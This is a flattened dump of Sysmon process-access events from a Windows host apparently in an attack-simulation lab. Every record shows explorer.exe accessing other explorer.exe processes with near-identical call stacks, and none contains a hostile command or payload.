16:52:29.668{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DF5-603E-54A8-00000000AD01}9088C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002236115Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.668{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DF5-603E-54A8-00000000AD01}9088C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002236114Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.668{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DF5-603E-54A8-00000000AD01}9088C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002236113Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.668{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DF5-603E-54A8-00000000AD01}9088C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002236112Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.668{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DF5-603E-54A8-00000000AD01}9088C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002236111Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.668{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DF5-603E-54A8-00000000AD01}9088C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002236110Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.668{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DF5-603E-54A8-00000000AD01}9088C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002236109Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.668{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DB8-603E-4BA8-00000000AD01}8092C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002236108Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.668{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DB8-603E-4BA8-00000000AD01}8092C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002236107Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.653{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DB8-603E-4BA8-00000000AD01}8092C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002236106Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.653{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DB8-603E-4BA8-00000000AD01}8092C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002236105Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.653{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DB8-603E-4BA8-00000000AD01}8092C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002236104Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.653{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DB8-603E-4BA8-00000000AD01}8092C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002236103Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.653{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DB8-603E-4BA8-00000000AD01}8092C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002236102Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.653{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DB8-603E-4BA8-00000000AD01}8092C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002236101Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.653{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DB8-603E-4BA8-00000000AD01}8092C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002236100Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.653{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DB8-603E-4BA8-00000000AD01}8092C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002236099Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.653{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C8D-603E-26A8-00000000AD01}9012C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002236098Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.653{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C8D-603E-26A8-00000000AD01}9012C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002236097Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.653{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C8D-603E-26A8-00000000AD01}9012C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002236096Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.653{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C8D-603E-26A8-00000000AD01}9012C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002236095Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 